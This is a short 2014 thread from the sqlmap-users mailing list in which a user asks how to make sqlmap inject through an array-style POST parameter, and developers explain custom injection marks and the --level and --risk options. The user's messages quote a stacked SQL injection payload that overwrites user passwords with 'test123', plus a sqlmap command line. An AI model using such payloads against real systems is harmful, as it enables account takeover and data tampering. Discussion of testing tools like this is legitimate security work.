Re: [sqlmap-users] (no subject)

Thu, 23 Oct 2014 17:31:25 -0700 

// Grrr, stupid gmail. Didn't reply-all first time :-P

Are you sure it's exploitable? Try upping the --level and --risk.

The #1* means the first * character you put into the --data parameter. It's
in lieu of saying something like "POST parameter 'derp' is not exploitable"
if you pass in --data="derp=testme" and ask it to test the "derp"
parameter.

Ryan

On Thu, Oct 23, 2014 at 5:14 AM, a dehqan <dehqa...@gmail.com> wrote:

> Thanks man ;
>
> I want to send an array with query in its index as value of "name" POST
> variable .
>
> Remember if i want inject it manually should try >
> <input type="text" id="edit-name" name="name[1 ;UPDATE {users} SET pass=
> 'test123'; -- ]" value="" size="60" maxlength="60" class="form-text
> required error">
>
> So tried (sqlmap/1.0-dev) :
>
> python sqlmap.py -u "http://localhost//?id=n&ssid=w";
> --data="name[0*]=name"  --risk=3 --flush-session --dbms=mysql
>
>
> Sqlmap returns this error:
>
> [WARNING] (custom) POST parameter '#1*' is not injectable
>
> What does # mean here ?
>
> And how to make it work under sqlmap ?
>
> Regards
>
> On Thu, Oct 23, 2014 at 11:00 AM, Miroslav Stampar <
> miroslav.stam...@gmail.com> wrote:
>
>> Hi.
>>
>> You need to put a custom injection mark * at the place where you want
>> sqlmap to inject. For example:
>>
>> ...name[1*]
>>
>> Bye
>>
>> p.s. your example with SELECT is not a proper one as queries are usually
>> not supported in stacking
>>
>> On Thu, Oct 23, 2014 at 7:43 AM, a dehqan <dehqa...@gmail.com> wrote:
>>
>>> Hi Guys ,
>>>
>>> Is Sqlmap able to send an array instead of string while injecting?
>>>
>>> Like situation we  have html form and we want manually send post
>>> variable 'name' this way (value is obtained from array) :
>>>
>>> name="name[1 ;select * from users -- ]
>>>
>>> I want do it with Sqlmap , but how ?
>>>
>>>
>>> Regards dehqan
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

------------------------------------------------------------------------------

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to